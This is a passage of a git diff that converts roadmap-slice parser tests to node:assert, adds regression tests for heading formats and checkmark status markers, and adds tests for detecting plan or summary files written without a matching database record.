+    assert.deepStrictEqual(slices[0].title, 'Setup Foundation', 'space-only: title');
+});
 
   // ═══════════════════════════════════════════════════════════════════════
   // J. Regression #1248: Non-zero-padded IDs
   // ═══════════════════════════════════════════════════════════════════════
-
-  console.log('\n=== J. #1248: Non-zero-padded IDs ===');
-
-  {
+test('J. #1248: Non-zero-padded IDs', () => {
     const content = '## S1: Setup\n\n## S2: Features\n';
     const slices = parseRoadmapSlices(content);
-    assertEq(slices.length, 2, 'non-padded: 2 slices');
-    assertEq(slices[0].id, 'S1', 'non-padded: S1');
-  }
+    assert.deepStrictEqual(slices.length, 2, 'non-padded: 2 slices');
+    assert.deepStrictEqual(slices[0].id, 'S1', 'non-padded: S1');
+});
 
   // ═══════════════════════════════════════════════════════════════════════
   // K. Regression #1248: "Slice" prefix
   // ═══════════════════════════════════════════════════════════════════════
-
-  console.log('\n=== K. #1248: "Slice" prefix ===');
-
-  {
+test('K. #1248: "Slice" prefix', () => {
     const content = '## Slice S01: Setup Foundation\n\n## Slice S02: Core Features\n';
     const slices = parseRoadmapSlices(content);
-    assertEq(slices.length, 2, 'Slice prefix: 2 slices');
-    assertEq(slices[0].id, 'S01', 'Slice prefix: S01');
-  }
+    assert.deepStrictEqual(slices.length, 2, 'Slice prefix: 2 slices');
+    assert.deepStrictEqual(slices[0].id, 'S01', 'Slice prefix: S01');
+});
 
   // ═══════════════════════════════════════════════════════════════════════
   // L. Prose with "Depends on:" line
   // ═══════════════════════════════════════════════════════════════════════
-
-  console.log('\n=== L. Prose with Depends on: ===');
-
-  {
+test('L. Prose with Depends on:', () => {
     const content = [
       '## S01: Foundation',
       '',
@@ -254,20 +217,17 @@ async function main(): Promise<void> {
     ].join('\n');
 
     const slices = parseRoadmapSlices(content);
-    assertEq(slices.length, 2, 'prose deps: 2 slices');
-    assertEq(slices[1].depends.length, 1, 'S02 has 1 dep');
-    assertEq(slices[1].depends[0], 'S01', 'S02 depends on S01');
-  }
+    assert.deepStrictEqual(slices.length, 2, 'prose deps: 2 slices');
+    assert.deepStrictEqual(slices[1].depends.length, 1, 'S02 has 1 dep');
+    assert.deepStrictEqual(slices[1].depends[0], 'S01', 'S02 depends on S01');
+});
 
   // ═══════════════════════════════════════════════════════════════════════
   // M. Empty / edge cases
   // ═══════════════════════════════════════════════════════════════════════
-
-  console.log('\n=== M. Edge cases ===');
-
-  {
-    assertEq(parseRoadmapSlices('').length, 0, 'empty content → 0 slices');
-    assertEq(parseRoadmapSlices('# Just a title\n\nSome text.').length, 0, 'no slices at all → 0');
+test('M. Edge cases', () => {
+    assert.deepStrictEqual(parseRoadmapSlices('').length, 0, 'empty content → 0 slices');
+    assert.deepStrictEqual(parseRoadmapSlices('# Just a title\n\nSome text.').length, 0, 'no slices at all → 0');
 
     // Mixed format: ## Slices section with one checkbox + prose below
     const mixed = [
@@ -281,81 +241,69 @@ async function main(): Promise<void> {
     ].join('\n');
     const mixedSlices = parseRoadmapSlices(mixed);
     // The ## Slices section takes priority — prose headers outside it aren't picked up
-    assertEq(mixedSlices.length, 1, 'mixed: only 1 slice from ## Slices section');
-    assertEq(mixedSlices[0].id, 'S01', 'mixed: S01 from checkbox');
-  }
+    assert.deepStrictEqual(mixedSlices.length, 1, 'mixed: only 1 slice from ## Slices section');
+    assert.deepStrictEqual(mixedSlices[0].id, 'S01', 'mixed: S01 from checkbox');
+});
 
   // ═══════════════════════════════════════════════════════════════════════
   // N. Dependency range expansion
   // ═══════════════════════════════════════════════════════════════════════
-
-  console.log('\n=== N. Dependency range expansion ===');
-
-  {
-    assertEq(
+test('N. Dependency range expansion', () => {
+    assert.deepStrictEqual(
       expandDependencies(['S01-S04']),
       ['S01', 'S02', 'S03', 'S04'],
       'S01-S04 → 4 individual deps',
     );
 
-    assertEq(
+    assert.deepStrictEqual(
       expandDependencies(['S01..S03']),
       ['S01', 'S02', 'S03'],
       'S01..S03 → 3 individual deps',
     );
 
-    assertEq(
+    assert.deepStrictEqual(
       expandDependencies(['S01']),
       ['S01'],
       'single dep passes through',
     );
 
-    assertEq(
+    assert.deepStrictEqual(
       expandDependencies(['S01', 'S03-S05']),
       ['S01', 'S03', 'S04', 'S05'],
       'mixed single + range',
     );
 
-    assertEq(
+    assert.deepStrictEqual(
       expandDependencies(['']),
       [],
       'empty string filtered out',
     );
-  }
+});
 
   // ═══════════════════════════════════════════════════════════════════════
   // O. No-separator colon-less: "S01:Title" (no space after colon)
   // ═══════════════════════════════════════════════════════════════════════
-
-  console.log('\n=== O. No space after colon ===');
-
-  {
+test('O. No space after colon', () => {
     const content = '## S01:Foundation\n\n## S02:Features\n';
     const slices = parseRoadmapSlices(content);
     // The regex uses [:\s.—–-]* which allows colon with no space
-    assertEq(slices.length, 2, 'no-space-colon: 2 slices');
-  }
+    assert.deepStrictEqual(slices.length, 2, 'no-space-colon: 2 slices');
+});
 
   // ═══════════════════════════════════════════════════════════════════════
   // P. Three-digit padded IDs
   // ═══════════════════════════════════════════════════════════════════════
-
-  console.log('\n=== P. Three-digit padded IDs ===');
-
-  {
+test('P. Three-digit padded IDs', () => {
     const content = '## S001: Foundation\n\n## S002: Features\n';
     const slices = parseRoadmapSlices(content);
-    assertEq(slices.length, 2, 'three-digit: 2 slices');
-    assertEq(slices[0].id, 'S001', 'three-digit: S001');
-  }
+    assert.deepStrictEqual(slices.length, 2, 'three-digit: 2 slices');
+    assert.deepStrictEqual(slices[0].id, 'S001', 'three-digit: S001');
+});
 
   // ═══════════════════════════════════════════════════════════════════════
   // Q. Regression #1736: Table format under ## Slices
   // ═══════════════════════════════════════════════════════════════════════
-
-  console.log('\n=== Q. #1736: Table format under ## Slices ===');
-
-  {
+test('Q. #1736: Table format under ## Slices', () => {
     const content = [
       '# M001: Test',
       '',
@@ -371,22 +319,19 @@ async function main(): Promise<void> {
     ].join('\n');
 
     const slices = parseRoadmapSlices(content);
-    assertEq(slices.length, 3, '#1736 table: 3 slices');
-    assertEq(slices[0].id, 'S01', '#1736 table: S01 id');
-    assertEq(slices[0].title, 'Setup Foundation', '#1736 table: S01 title');
-    assertEq(slices[0].done, true, '#1736 table: S01 done');
-    assertEq(slices[0].risk, 'low', '#1736 table: S01 risk');
-    assertEq(slices[1].done, false, '#1736 table: S02 not done');
-    assertEq(slices[2].done, true, '#1736 table: S03 done');
-  }
+    assert.deepStrictEqual(slices.length, 3, '#1736 table: 3 slices');
+    assert.deepStrictEqual(slices[0].id, 'S01', '#1736 table: S01 id');
+    assert.deepStrictEqual(slices[0].title, 'Setup Foundation', '#1736 table: S01 title');
+    assert.deepStrictEqual(slices[0].done, true, '#1736 table: S01 done');
+    assert.deepStrictEqual(slices[0].risk, 'low', '#1736 table: S01 risk');
+    assert.deepStrictEqual(slices[1].done, false, '#1736 table: S02 not done');
+    assert.deepStrictEqual(slices[2].done, true, '#1736 table: S03 done');
+});
 
   // ═══════════════════════════════════════════════════════════════════════
   // R. Regression #1736: Table format under ## Slice Overview
   // ═══════════════════════════════════════════════════════════════════════
-
-  console.log('\n=== R. #1736: Table format under ## Slice Overview ===');
-
-  {
+test('R. #1736: Table format under ## Slice Overview', () => {
     const content = [
       '# M002: Overview Heading',
       '',
@@ -400,18 +345,15 @@ async function main(): Promise<void> {
     ].join('\n');
 
     const slices = parseRoadmapSlices(content);
-    assertEq(slices.length, 2, '#1736 overview: 2 slices');
-    assertEq(slices[0].done, true, '#1736 overview: S01 done');
-    assertEq(slices[1].done, false, '#1736 overview: S02 not done');
-  }
+    assert.deepStrictEqual(slices.length, 2, '#1736 overview: 2 slices');
+    assert.deepStrictEqual(slices[0].done, true, '#1736 overview: S01 done');
+    assert.deepStrictEqual(slices[1].done, false, '#1736 overview: S02 not done');
+});
 
   // ═══════════════════════════════════════════════════════════════════════
   // S. Regression #1736: Table with Done/Complete text status
   // ═══════════════════════════════════════════════════════════════════════
-
-  console.log('\n=== S. #1736: Table with text status ===');
-
-  {
+test('S. #1736: Table with text status', () => {
     const content = [
       '# M003: Status Text',
       '',
@@ -426,19 +368,16 @@ async function main(): Promise<void> {
     ].join('\n');
 
     const slices = parseRoadmapSlices(content);
-    assertEq(slices.length, 3, '#1736 text status: 3 slices');
-    assertTrue(slices[0].done, '#1736 text status: Done = true');
-    assertTrue(!slices[1].done, '#1736 text status: Pending = false');
-    assertTrue(slices[2].done, '#1736 text status: Completed = true');
-  }
+    assert.deepStrictEqual(slices.length, 3, '#1736 text status: 3 slices');
+    assert.ok(slices[0].done, '#1736 text status: Done = true');
+    assert.ok(!slices[1].done, '#1736 text status: Pending = false');
+    assert.ok(slices[2].done, '#1736 text status: Completed = true');
+});
 
   // ═══════════════════════════════════════════════════════════════════════
   // T. Regression #1736: Checkbox format still works after table support
   // ═══════════════════════════════════════════════════════════════════════
-
-  console.log('\n=== T. #1736: Checkbox format unchanged ===');
-
-  {
+test('T. #1736: Checkbox format unchanged', () => {
     const content = [
       '# M005: Unchanged',
       '',
@@ -451,16 +390,10 @@ async function main(): Promise<void> {
     ].join('\n');
 
     const slices = parseRoadmapSlices(content);
-    assertEq(slices.length, 2, '#1736 checkbox compat: 2 slices');
-    assertEq(slices[0].done, true, '#1736 checkbox compat: S01 done');
-    assertEq(slices[0].demo, 'demo works.', '#1736 checkbox compat: demo');
-    assertEq(slices[1].done, false, '#1736 checkbox compat: S02 not done');
-  }
-
-  report();
-}
-
-main().catch((error) => {
-  console.error(error);
-  process.exit(1);
+    assert.deepStrictEqual(slices.length, 2, '#1736 checkbox compat: 2 slices');
+    assert.deepStrictEqual(slices[0].done, true, '#1736 checkbox compat: S01 done');
+    assert.deepStrictEqual(slices[0].demo, 'demo works.', '#1736 checkbox compat: demo');
+    assert.deepStrictEqual(slices[1].done, false, '#1736 checkbox compat: S02 not done');
+});
+
 });
diff --git a/src/resources/extensions/gsd/tests/roadmap-slices.test.ts b/src/resources/extensions/gsd/tests/roadmap-slices.test.ts
index 3a954d353..662013ad6 100644
--- a/src/resources/extensions/gsd/tests/roadmap-slices.test.ts
+++ b/src/resources/extensions/gsd/tests/roadmap-slices.test.ts
@@ -1,6 +1,6 @@
 import test from "node:test";
 import assert from "node:assert/strict";
-import { parseRoadmap } from "../files.ts";
+import { parseRoadmap } from "../parsers-legacy.ts";
 import { parseRoadmapSlices, expandDependencies } from "../roadmap-slices.ts";
 
 const content = `# M003: Current
@@ -116,6 +116,36 @@ test("parseRoadmapSlices: table with Status Done/Complete text (#1736)", () => {
   assert.equal(slices[2]?.done, true);
 });
 
+test("parseRoadmapSlices: table with glyph completion markers (#2841)", () => {
+  const tableContent = [
+    "# M003: Glyph Status", "", "## Slices", "",
+    "| Slice | Title | Risk | Status |", "|---|---|---|---|",
+    "| S01 | First | Low | ✅ |",
+    "| S02 | Second | High | Pending |",
+    "| S03 | Third | Medium | ☑ |",
+    "| S04 | Fourth | Medium | ✓ |", "",
+  ].join("\n");
+  const slices = parseRoadmapSlices(tableContent);
+  assert.equal(slices.length, 4);
+  assert.equal(slices[0]?.done, true);
+  assert.equal(slices[1]?.done, false);
+  assert.equal(slices[2]?.done, true);
+  assert.equal(slices[3]?.done, true);
+});
+
+test("parseRoadmapSlices: table with heavy check mark U+2714 (#2940)", () => {
+  const tableContent = [
+    "# M003: Heavy Check", "", "## Slices", "",
+    "| Slice | Title | Risk | Status |", "|---|---|---|---|",
+    "| S01 | First | Low | \u2714 |",
+    "| S02 | Second | High | Pending |", "",
+  ].join("\n");
+  const slices = parseRoadmapSlices(tableContent);
+  assert.equal(slices.length, 2);
+  assert.equal(slices[0]?.done, true, "U+2714 heavy check mark should mark slice as done");
+  assert.equal(slices[1]?.done, false);
+});
+
 test("parseRoadmapSlices: table with dependencies column (#1736)", () => {
   const tableContent = [
     "# M004: Deps", "", "## Slices", "",
@@ -236,6 +266,32 @@ test("parseRoadmapSlices: ## Slices with valid checkboxes does NOT invoke prose
   assert.equal(slices[0]?.done, true);
 });
 
+// ── Regression test for #1940 ───────────────────────────────────────────────
+// '## Slice Roadmap' header is not recognized by extractSlicesSection, causing
+// checkbox-format slices to be missed and all slices reported as incomplete.
+
+test("parseRoadmapSlices: ## Slice Roadmap heading recognized (#1940)", () => {
+  const roadmapContent = [
+    "# M002: Current Milestone", "",
+    "**Vision:** Ship it.", "",
+    "## Slice Roadmap", "",
+    "- [x] **S01: Foundation** `risk:low` `depends:[]`",
+    "  > After this: base layer works.",
+    "- [x] **S02: Core Logic** `risk:medium` `depends:[S01]`",
+    "- [ ] **S03: Polish** `risk:low` `depends:[S01,S02]`", "",
+    "## Boundary Map",
+  ].join("\n");
+  const slices = parseRoadmapSlices(roadmapContent);
+  assert.equal(slices.length, 3, "should parse 3 slices under '## Slice Roadmap'");
+  assert.equal(slices[0]?.id, "S01");
+  assert.equal(slices[0]?.done, true, "S01 should be marked done");
+  assert.equal(slices[1]?.id, "S02");
+  assert.equal(slices[1]?.done, true, "S02 should be marked done");
+  assert.equal(slices[2]?.id, "S03");
+  assert.equal(slices[2]?.done, false, "S03 should be pending");
+  assert.deepEqual(slices[2]?.depends, ["S01", "S02"]);
+});
+
 test("parseRoadmapSlices: ## Slices with only non-matching lines returns prose fallback results", () => {
   const weirdContent = `# M020: Odd
 
@@ -253,3 +309,156 @@ Do the second thing.
   assert.equal(slices[0]?.id, "S01");
   assert.equal(slices[1]?.id, "S02");
 });
+
+// ── Regression tests for #2567 ─────────────────────────────────────────────
+// Prose H3 parser fails on common LLM-generated patterns: numbered prefixes,
+// parenthetical numbering, bracketed IDs, and indented headings.
+
+test("parseRoadmapSlices: numbered H3 headers under ## Slices (#2567)", () => {
+  const numberedContent = `# M002: My Milestone
+
+**Vision:** Ship the product.
+
+## Slices
+
+### 1. S01: Setup Environment
+Set up the dev environment and tooling.
+
+### 2. S02: Build Core
+Implement the core logic.
+**Depends on:** S01
+
+### 3. S03: Polish UI
+Final polish and theming.
+**Depends on:** S01, S02
+`;
+  const slices = parseRoadmapSlices(numberedContent);
+  assert.equal(slices.length, 3, "should parse 3 slices from numbered H3 headers");
+  assert.equal(slices[0]?.id, "S01");
+  assert.equal(slices[0]?.title, "Setup Environment");
+  assert.equal(slices[1]?.id, "S02");
+  assert.deepEqual(slices[1]?.depends, ["S01"]);
+  assert.equal(slices[2]?.id, "S03");
+  assert.deepEqual(slices[2]?.depends, ["S01", "S02"]);
+});
+
+test("parseRoadmapSlices: parenthetical-numbered H3 headers (#2567)", () => {
+  const parenContent = `# M002: Milestone
+
+**Vision:** Ship.
+
+## Slices
+
+### (1) S01: Setup
+Setup work.
+
+### (2) S02: Build
+Build work.
+**Depends on:** S01
+`;
+  const slices = parseRoadmapSlices(parenContent);
+  assert.equal(slices.length, 2, "should parse slices with parenthetical numbering");
+  assert.equal(slices[0]?.id, "S01");
+  assert.equal(slices[0]?.title, "Setup");
+  assert.equal(slices[1]?.id, "S02");
+  assert.deepEqual(slices[1]?.depends, ["S01"]);
+});
+
+test("parseRoadmapSlices: bracketed slice IDs in H3 headers (#2567)", () => {
+  const bracketContent = `# M002: Milestone
+
+**Vision:** Ship.
+
+## Slices
+
+### [S01] Setup Environment
+Setup work.
+
+### [S02] Build Core
+Build work.
+**Depends on:** S01
+`;
+  const slices = parseRoadmapSlices(bracketContent);
+  assert.equal(slices.length, 2, "should parse slices with bracketed IDs");
+  assert.equal(slices[0]?.id, "S01");
+  assert.equal(slices[0]?.title, "Setup Environment");
+  assert.equal(slices[1]?.id, "S02");
+  assert.deepEqual(slices[1]?.depends, ["S01"]);
+});
+
+test("parseRoadmapSlices: indented H3 headers under ## Slices (#2567)", () => {
+  const indentedContent = `# M002: Milestone
+
+**Vision:** Ship.
+
+## Slices
+
+  ### S01: Setup
+  Setup work.
+
+  ### S02: Build
+  Build work.
+`;
+  const slices = parseRoadmapSlices(indentedContent);
+  assert.equal(slices.length, 2, "should parse slices from indented H3 headers");
+  assert.equal(slices[0]?.id, "S01");
+  assert.equal(slices[0]?.title, "Setup");
+  assert.equal(slices[1]?.id, "S02");
+  assert.equal(slices[1]?.title, "Build");
+});
+
+// ── Regression tests for #1884: ✅ (U+2705) completion marker ──────────────
+
+test("parseRoadmapSlices: prose headers with ✅ suffix detected as done (#1884)", () => {
+  const proseContent = `# M013: Prose Roadmap
+
+### S01: Plan Limits & Billing Foundation ✅
+All tasks done.
+
+### S02: Usage Tracking
+Not done yet.
+
+### S03: Notification System ✅
+Also done.
+`;
+  const slices = parseRoadmapSlices(proseContent);
+  assert.equal(slices.length, 3);
+  assert.equal(slices[0]?.id, "S01");
+  assert.equal(slices[0]?.done, true, "S01 with trailing ✅ should be done");
+  assert.equal(slices[0]?.title, "Plan Limits & Billing Foundation");
+  assert.equal(slices[1]?.done, false);
+  assert.equal(slices[2]?.done, true, "S03 with trailing ✅ should be done");
+  assert.equal(slices[2]?.title, "Notification System");
+});
+
+test("parseRoadmapSlices: prose headers with ✅ prefix before title detected as done (#1884)", () => {
+  const proseContent = `# M014: Prose
+
+## ✅ S01: Done Slice
+Complete.
+
+## S02: Pending Slice
+Not done.
+`;
+  const slices = parseRoadmapSlices(proseContent);
+  assert.equal(slices.length, 2);
+  assert.equal(slices[0]?.done, true, "prefix ✅ should mark as done");
+  assert.equal(slices[0]?.title, "Done Slice");
+  assert.equal(slices[1]?.done, false);
+});
+
+test("parseRoadmapSlices: prose headers with ✅ after separator detected as done (#1884)", () => {
+  const proseContent = `# M015: Prose
+
+## S01: ✅ First Feature
+Done.
+
+## S02: Second Feature
+Not done.
+`;
+  const slices = parseRoadmapSlices(proseContent);
+  assert.equal(slices.length, 2);
+  assert.equal(slices[0]?.done, true, "✅ after colon should mark as done");
+  assert.equal(slices[0]?.title, "First Feature");
+  assert.equal(slices[1]?.done, false);
+});
diff --git a/src/resources/extensions/gsd/tests/rogue-file-detection.test.ts b/src/resources/extensions/gsd/tests/rogue-file-detection.test.ts
new file mode 100644
index 000000000..09110adf7
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/rogue-file-detection.test.ts
@@ -0,0 +1,295 @@
+/**
+ * Rogue file detection tests — verifies that detectRogueFileWrites()
+ * correctly identifies summary files written directly to disk without
+ * a corresponding DB completion record.
+ */
+
+import test from "node:test";
+import assert from "node:assert/strict";
+import { existsSync, mkdirSync, mkdtempSync, realpathSync, rmSync, writeFileSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+
+import { detectRogueFileWrites } from "../auto-post-unit.ts";
+import { openDatabase, closeDatabase, isDbAvailable, insertMilestone, insertSlice, insertTask, updateSliceStatus, upsertMilestonePlanning } from "../gsd-db.ts";
+
+// ── Helpers ──────────────────────────────────────────────────────────────────
+
+function createTmpBase(): string {
+  return realpathSync(mkdtempSync(join(tmpdir(), "gsd-rogue-test-")));
+}
+
+/**
+ * Create a minimal .gsd/ directory structure with a task summary file.
+ */
+function createTaskSummaryOnDisk(basePath: string, mid: string, sid: string, tid: string): string {
+  const tasksDir = join(basePath, ".gsd", "milestones", mid, "slices", sid, "tasks");
+  mkdirSync(tasksDir, { recursive: true });
+  const summaryFile = join(tasksDir, `${tid}-SUMMARY.md`);
+  writeFileSync(summaryFile, `---\nid: ${tid}\nparent: ${sid}\nmilestone: ${mid}\n---\n# ${tid}: Test\n`, "utf-8");
+  return summaryFile;
+}
+
+/**
+ * Create a minimal .gsd/ directory structure with a slice summary file.
+ */
+function createSliceSummaryOnDisk(basePath: string, mid: string, sid: string): string {
+  const sliceDir = join(basePath, ".gsd", "milestones", mid, "slices", sid);
+  mkdirSync(sliceDir, { recursive: true });
+  const summaryFile = join(sliceDir, `${sid}-SUMMARY.md`);
+  writeFileSync(summaryFile, `---\nid: ${sid}\nmilestone: ${mid}\n---\n# ${sid}: Test Slice\n`, "utf-8");
+  return summaryFile;
+}
+
+function createRoadmapOnDisk(basePath: string, mid: string): string {
+  const milestoneDir = join(basePath, ".gsd", "milestones", mid);
+  mkdirSync(milestoneDir, { recursive: true });
+  const roadmapFile = join(milestoneDir, `${mid}-ROADMAP.md`);
+  writeFileSync(roadmapFile, `# ${mid}: Test Roadmap\n`, "utf-8");
+  return roadmapFile;
+}
+
+function createSlicePlanOnDisk(basePath: string, mid: string, sid: string): string {
+  const sliceDir = join(basePath, ".gsd", "milestones", mid, "slices", sid);
+  mkdirSync(sliceDir, { recursive: true });
+  const planFile = join(sliceDir, `${sid}-PLAN.md`);
+  writeFileSync(planFile, `# ${sid}: Test Plan\n`, "utf-8");
+  return planFile;
+}
+
+
+// ── Tests ────────────────────────────────────────────────────────────────────
+
+test("rogue detection: task summary on disk, no DB row → detected as rogue", () => {
+  const basePath = createTmpBase();
+  const dbPath = join(basePath, ".gsd", "gsd.db");
+  mkdirSync(join(basePath, ".gsd"), { recursive: true });
+
+  try {
+    openDatabase(dbPath);
+    assert.ok(isDbAvailable(), "DB should be available");
+
+    const summaryPath = createTaskSummaryOnDisk(basePath, "M001", "S01", "T01");
+    assert.ok(existsSync(summaryPath), "Summary file should exist on disk");
+
+    const rogues = detectRogueFileWrites("execute-task", "M001/S01/T01", basePath);
+    assert.equal(rogues.length, 1, "Should detect one rogue file");
+    assert.equal(rogues[0].path, summaryPath);
+    assert.equal(rogues[0].unitType, "execute-task");
+    assert.equal(rogues[0].unitId, "M001/S01/T01");
+  } finally {
+    closeDatabase();
+    rmSync(basePath, { recursive: true, force: true });
+  }
+});
+
+test("rogue detection: task summary on disk, DB row with status 'complete' → NOT rogue", () => {
+  const basePath = createTmpBase();
+  const dbPath = join(basePath, ".gsd", "gsd.db");
+  mkdirSync(join(basePath, ".gsd"), { recursive: true });
+
+  try {
+    openDatabase(dbPath);
+
+    createTaskSummaryOnDisk(basePath, "M001", "S01", "T01");
+
+    // Insert parent milestone and slice first (foreign key constraints)
+    insertMilestone({ id: "M001" });
+    insertSlice({ milestoneId: "M001", id: "S01" });
+
+    // Insert a completed task row into the DB (INSERT OR REPLACE)
+    insertTask({
+      milestoneId: "M001",
+      sliceId: "S01",
+      id: "T01",
+      title: "Test Task",
+      status: "complete",
+      oneLiner: "Test",
+    });
+
+    const rogues = detectRogueFileWrites("execute-task", "M001/S01/T01", basePath);
+    assert.equal(rogues.length, 0, "Should NOT detect rogue when DB row is complete");
+  } finally {
+    closeDatabase();
+    rmSync(basePath, { recursive: true, force: true });
+  }
+});
+
+test("rogue detection: no summary file on disk → NOT rogue regardless of DB state", () => {
+  const basePath = createTmpBase();
+  const dbPath = join(basePath, ".gsd", "gsd.db");
+  mkdirSync(join(basePath, ".gsd"), { recursive: true });
+
+  try {
+    openDatabase(dbPath);
+
+    // Don't create any summary file on disk
+    const rogues = detectRogueFileWrites("execute-task", "M001/S01/T01", basePath);
+    assert.equal(rogues.length, 0, "Should NOT detect rogue when no file on disk");
+  } finally {
+    closeDatabase();
+    rmSync(basePath, { recursive: true, force: true });
+  }
+});
+
+test("rogue detection: DB not available → returns empty array (graceful degradation)", () => {
+  const basePath = createTmpBase();
+
+  try {
+    closeDatabase();
+    assert.ok(!isDbAvailable(), "DB should not be available");
+
+    // Create a file on disk even though DB is closed
+    createTaskSummaryOnDisk(basePath, "M001", "S01", "T01");
+
+    const rogues = detectRogueFileWrites("execute-task", "M001/S01/T01", basePath);
+    assert.equal(rogues.length, 0, "Should return empty array when DB unavailable");
+  } finally {
+    rmSync(basePath, { recursive: true, force: true });
+  }
+});
+
+test("rogue detection: slice summary on disk, no DB row → auto-remediated (not rogue)", () => {
+  const basePath = createTmpBase();
+  const dbPath = join(basePath, ".gsd", "gsd.db");
+  mkdirSync(join(basePath, ".gsd"), { recursive: true });
+
+  try {
+    openDatabase(dbPath);
+
+    const summaryPath = createSliceSummaryOnDisk(basePath, "M001", "S01");
+    assert.ok(existsSync(summaryPath), "Slice summary file should exist on disk");
+
+    // Fix #3633: stale slice DB status is auto-remediated via updateSliceStatus()
+    // instead of being reported as rogue, so rogues array should be empty.
+    const rogues = detectRogueFileWrites("complete-slice", "M001/S01", basePath);
+    assert.equal(rogues.length, 0, "Should auto-remediate stale slice, not report as rogue");
+  } finally {
+    closeDatabase();
+    rmSync(basePath, { recursive: true, force: true });
+  }
+});
+
+test("rogue detection: slice summary on disk, DB row with status 'complete' → NOT rogue", () => {
+  const basePath = createTmpBase();
+  const dbPath = join(basePath, ".gsd", "gsd.db");
+  mkdirSync(join(basePath, ".gsd"), { recursive: true });
+
+  try {
+    openDatabase(dbPath);
+
+    createSliceSummaryOnDisk(basePath, "M001", "S01");
+
+    // Insert parent milestone first (foreign key constraint)
+    insertMilestone({ id: "M001" });
+
+    // Insert a slice row, then update to complete
+    insertSlice({
+      milestoneId: "M001",
+      id: "S01",
+      title: "Test Slice",
+      status: "complete",
+    });
+    updateSliceStatus("M001", "S01", "complete", new Date().toISOString());
+
+    const rogues = detectRogueFileWrites("complete-slice", "M001/S01", basePath);
+    assert.equal(rogues.length, 0, "Should NOT detect rogue when slice DB row is complete");
+  } finally {
+    closeDatabase();
+    rmSync(basePath, { recursive: true, force: true });
+  }
+});
+
+test("rogue detection: plan milestone roadmap on disk, no milestone planning row → detected as rogue", () => {
+  const basePath = createTmpBase();
+  const dbPath = join(basePath, ".gsd", "gsd.db");
+  mkdirSync(join(basePath, ".gsd"), { recursive: true });
+
+  try {
+    openDatabase(dbPath);
+
+    const roadmapPath = createRoadmapOnDisk(basePath, "M001");
+    assert.ok(existsSync(roadmapPath), "Roadmap file should exist on disk");
+
+    const rogues = detectRogueFileWrites("plan-milestone", "M001", basePath);
+    assert.equal(rogues.length, 1, "Should detect one rogue roadmap file");
+    assert.equal(rogues[0].path, roadmapPath);
+    assert.equal(rogues[0].unitType, "plan-milestone");
+    assert.equal(rogues[0].unitId, "M001");
+  } finally {
+    closeDatabase();
+    rmSync(basePath, { recursive: true, force: true });
+  }
+});
+
+test("rogue detection: plan milestone roadmap on disk, DB milestone planning row exists → NOT rogue", () => {
+  const basePath = createTmpBase();
+  const dbPath = join(basePath, ".gsd", "gsd.db");
+  mkdirSync(join(basePath, ".gsd"), { recursive: true });
+
+  try {
+    openDatabase(dbPath);
+
+    createRoadmapOnDisk(basePath, "M001");
+    insertMilestone({ id: "M001", title: "Planned Milestone" });
+    upsertMilestonePlanning("M001", {
+      vision: "Real planning state",
+      requirementCoverage: "R001 → S01",
+      boundaryMapMarkdown: "- planner → db",
+    });
+
+    const rogues = detectRogueFileWrites("plan-milestone", "M001", basePath);
+    assert.equal(rogues.length, 0, "Should NOT detect rogue when milestone planning state exists");
+  } finally {
+    closeDatabase();
+    rmSync(basePath, { recursive: true, force: true });
+  }
+});
+
+test("rogue detection: slice plan on disk, no slice planning row → detected as rogue", () => {
+  const basePath = createTmpBase();
+  const dbPath = join(basePath, ".gsd", "gsd.db");
+  mkdirSync(join(basePath, ".gsd"), { recursive: true });
+
+  try {
+    openDatabase(dbPath);
+
+    const planPath = createSlicePlanOnDisk(basePath, "M001", "S01");
+    assert.ok(existsSync(planPath), "Slice plan file should exist on disk");
+
+    const rogues = detectRogueFileWrites("plan-slice", "M001/S01", basePath);
+    assert.equal(rogues.length, 1, "Should detect one rogue slice plan file");
+    assert.equal(rogues[0].path, planPath);
+    assert.equal(rogues[0].unitType, "plan-slice");
+    assert.equal(rogues[0].unitId, "M001/S01");
+  } finally {
+    closeDatabase();
+    rmSync(basePath, { recursive: true, force: true });
+  }
+});
+
+test("rogue detection: slice plan on disk, DB slice planning row exists → NOT rogue", () => {
+  const basePath = createTmpBase();
+  const dbPath = join(basePath, ".gsd", "gsd.db");
+  mkdirSync(join(basePath, ".gsd"), { recursive: true });
+
+  try {
+    openDatabase(dbPath);
+
+    createSlicePlanOnDisk(basePath, "M001", "S01");
+    insertMilestone({ id: "M001" });
+    insertSlice({
+      milestoneId: "M001",
+      id: "S01",
+      title: "Planned Slice",
+      status: "pending",
+      demo: "Observable plan",
+    });
+
+    const rogues = detectRogueFileWrites("plan-slice", "M001/S01", basePath);
+    assert.equal(rogues.length, 0, "Should NOT detect rogue when slice planning state exists");
+  } finally {
+    closeDatabase();
+    rmSync(basePath, { recursive: true, force: true });
+  }
+});
diff --git a/src/resources/extensions/gsd/tests/rule-registry.test.ts b/src/resources/extensions/gsd/tests/rule-registry.test.ts
index 027f46fe6..b10455d5c 100644
--- a/src/resources/extensions/gsd/tests/rule-registry.test.ts
+++ b/src/resources/extensions/gsd/tests/rule-registry.test.ts
@@ -3,8 +3,8 @@
 // Tests the RuleRegistry class, UnifiedRule types, singleton accessors,
 // and evaluation methods using mock rules.
 
+import assert from 'node:assert/strict';
 import { test, describe, beforeEach } from "node:test";
-import { createTestContext } from "./test-helpers.ts";
 import {
   RuleRegistry,
   getRegistry,
@@ -64,9 +64,7 @@ function makeContext(phase: string): DispatchContext {
 // ─── Tests ────────────────────────────────────────────────────────────────
 
 describe("RuleRegistry", () => {
-  const { assertEq, assertTrue } = createTestContext();
-
-  beforeEach(() => {
+    beforeEach(() => {
     resetRegistry();
   });
 
@@ -81,10 +79,10 @@ describe("RuleRegistry", () => {
 
     // At minimum, dispatch rules are returned (hook rules depend on prefs)
     const dispatchRules = listed.filter(r => r.when === "dispatch");
-    assertEq(dispatchRules.length, 3, "listRules returns 3 dispatch rules");
-    assertEq(dispatchRules[0].name, "rule-a", "first rule name is rule-a");
-    assertEq(dispatchRules[1].name, "rule-b", "second rule name is rule-b");
-    assertEq(dispatchRules[2].name, "rule-c", "third rule name is rule-c");
+    assert.deepStrictEqual(dispatchRules.length, 3, "listRules returns 3 dispatch rules");
+    assert.deepStrictEqual(dispatchRules[0].name, "rule-a", "first rule name is rule-a");
+    assert.deepStrictEqual(dispatchRules[1].name, "rule-b", "second rule name is rule-b");
+    assert.deepStrictEqual(dispatchRules[2].name, "rule-c", "third rule name is rule-c");
   });
 
